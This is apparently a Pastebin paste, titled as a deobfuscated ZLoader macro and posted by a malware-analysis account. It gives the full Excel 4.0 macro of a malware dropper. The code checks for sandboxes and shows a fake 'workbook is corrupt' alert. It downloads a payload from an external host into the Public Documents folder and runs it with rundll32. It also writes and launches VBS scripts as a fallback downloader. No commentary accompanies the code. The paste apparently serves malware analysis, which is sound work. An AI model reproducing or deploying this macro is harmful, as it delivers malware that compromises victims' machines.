Advertisement
dissectmalware

zloader deobfuscated macro

Jan 26th, 2021
489
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
  1. =INT(APP.MAXIMIZE())+124
  2. =INT(GET.WORKSPACE(14)>390)+126
  3. =INT(GET.WORKSPACE(42))+107
  4. =INT(GET.WORKSPACE(19))+96
  5. =INT(GET.WORKSPACE(13)>800)+125
  6. =NOW()
  7. =WAIT(NOW()+"00:00:01")
  8. =NOW()
  9. =INT(($C$119-$C$117)*100000>1)+111
  10. p="C:\Users\Public\Documents\"
  11. n=CHAR(13)
  12. =DEFINE.NAME("ETdTgdE", "={"&$C$112&";"&$C$113&";"&$C$114&";"&$C$115&";"&$C$116&";"&$C$120&"}")
  13. =DEFINE.NAME("mNNthHi",VUTrsT)
  14. =DEFINE.NAME("WUGxMIH",130)
  15. =DEFINE.NAME("xairqY",0)
  16. =DEFINE.NAME("UKVqOBu",0)
  17. =BVKEetMJW()
  18. =HALT()
  19. e="https://amethystwinds.com/k.php"
  20. f="https://amethystwinds.com/k.php"
  21. =IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),,GOTO($C$141))
  22. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,e,p&"nIpymd.txt",0,0)
  23. =IF($C$133<>0,,GOTO($C$136))
  24. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,f,p&"nIpymd.txt",0,0)
  25. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  26. a="ShellExecuteA"
  27. b="C:\Windows\system32\rundll32.exe"
  28. =CALL("Shell32",a,"JJCCCJJ",0,"open",b,p&"nIpymd.txt,DllRegisterServer",0,5)
  29. =CLOSE(FALSE)
  30. =FOPEN(p&"imX0rsfm.vbs",3)
  31. =FWRITELN($C$141,"KVgAD = """&e&""""&n&"EerVWB = """&f&"""")
  32. =FWRITELN($C$141,"NAN = Array(KVgAD,EerVWB)")
  33. =FWRITELN($C$141,"Dim LCFn: Set LCFn = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")
  34. =FWRITELN($C$141,"Function oSIpW(data):"&n&"LCFn.setOption(2) = 13056")
  35. =FWRITELN($C$141,"LCFn.Open ""GET"",data,False")
  36. =FWRITELN($C$141,"LCFn.Send"&n&"oSIpW = LCFn.Status"&n&"End Function"&n&"For Each qn6KPR in NAN")
  37. =FWRITELN($C$141,"If oSIpW(qn6KPR) = 200 Then"&n&"Dim ywQyr: Set ywQyr = CreateObject(""ADODB.Stream"")")
  38. =FWRITELN($C$141,"ywQyr.Open"&n&"ywQyr.Type = 1"&n&"ywQyr.Write LCFn.ResponseBody")
  39. =FWRITELN($C$141,"ywQyr.SaveToFile """&p&"nIpymd.txt"",2"&n&"ywQyr.Close")
  40. =FWRITELN($C$141,"Exit For"&n&"End If"&n&"Next")
  41. =FCLOSE($C$141)
  42. =EXEC("explorer.exe "&p&"imX0rsfm.vbs")
  43. =WHILE(ISERROR(FILES(p&"nIpymd.txt")))
  44. =WAIT(NOW()+"00:00:01")
  45. =NEXT()
  46. =FILE.DELETE(p&"imX0rsfm.vbs")
  47. =WAIT(NOW()+"00:00:02")
  48. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")
  49. =FOPEN(p&"QRhR.vbs",3)
  50. =FWRITELN($C$160,"Set brdnU0PE = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")
  51. d="brdnU0PE.Document.Application.ShellExecute ""rundll32.exe"","""
  52. =FWRITELN($C$160,d&p&"nIpymd.txt,DllRegisterServer"",""C:\Windows\System32"",Null,0")
  53. =FCLOSE($C$160)
  54. =WAIT(NOW()+"00:00:01")
  55. =EXEC("explorer.exe "&p&"QRhR.vbs")
  56. =CLOSE(FALSE)
  57.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement